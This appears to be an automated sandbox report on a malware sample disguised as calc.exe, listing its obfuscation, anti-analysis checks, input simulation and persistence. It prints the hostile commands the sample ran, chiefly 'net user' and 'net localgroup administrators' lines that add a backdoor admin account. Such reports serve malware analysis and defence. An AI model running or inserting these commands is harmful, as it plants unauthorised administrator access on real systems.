Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\calc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00439814 CharLowerBuffW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,_strcat,GetCurrentProcess,TerminateProcess,VariantClear,FreeLibrary, 0_2_00439814
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0044C070 push eax; ret 0_2_0044C084
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0044C070 push eax; ret 0_2_0044C0AC
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0044D7C3 push ecx; ret 0_2_0044D7D3
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Adds a new user with administrator rights
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00412196 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00412196
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00440FF0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00440FF0
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe Process information set: NOOPENFILEERRORBOX
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\calc.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\calc.exe API coverage: 4.6 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00425639 FindFirstFileW,FindFirstFileW,SetCurrentDirectoryW,FindClose,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00425639
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_004230D5 FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_004230D5
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0041510D FindFirstFileW,DeleteFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,FindNextFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose, 0_2_0041510D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0042320D FindFirstFileW,FindClose, 0_2_0042320D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00426292 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00426292
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00425838 FindFirstFileW,FindNextFileW,FindClose, 0_2_00425838
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00422C4D FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 0_2_00422C4D
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00414E16 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00414E16
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00414FFA FindFirstFileW,DeleteFileW,FindNextFileW,FindClose, 0_2_00414FFA
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0040EA76 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,FreeLibrary, 0_2_0040EA76
Source: calc.exe, 0000007C.00000002.1596560973.0000000000678000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hWar&Prod_VMware_SATA_CD00#
Source: calc.exe, 000000A4.00000002.1684181540.00000000007F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _NECVMWaod_VMware_SA
Source: calc.exe, 00000094.00000002.1642525671.00000000005F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: calc.exe, 00000074.00000002.1583093732.0000000000718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00439814 CharLowerBuffW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,_strcat,GetCurrentProcess,TerminateProcess,VariantClear,FreeLibrary, 0_2_00439814
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_0040109D GetCurrentDirectoryW,GetFullPathNameW,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,SetCurrentDirectoryW, 0_2_0040109D
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00412196 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00412196
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\calc.exe Code function: 0_2_00415D53 mouse_event, 0_2_00415D53
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JI8Y5YVUqE.jse Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add Jump to behavior
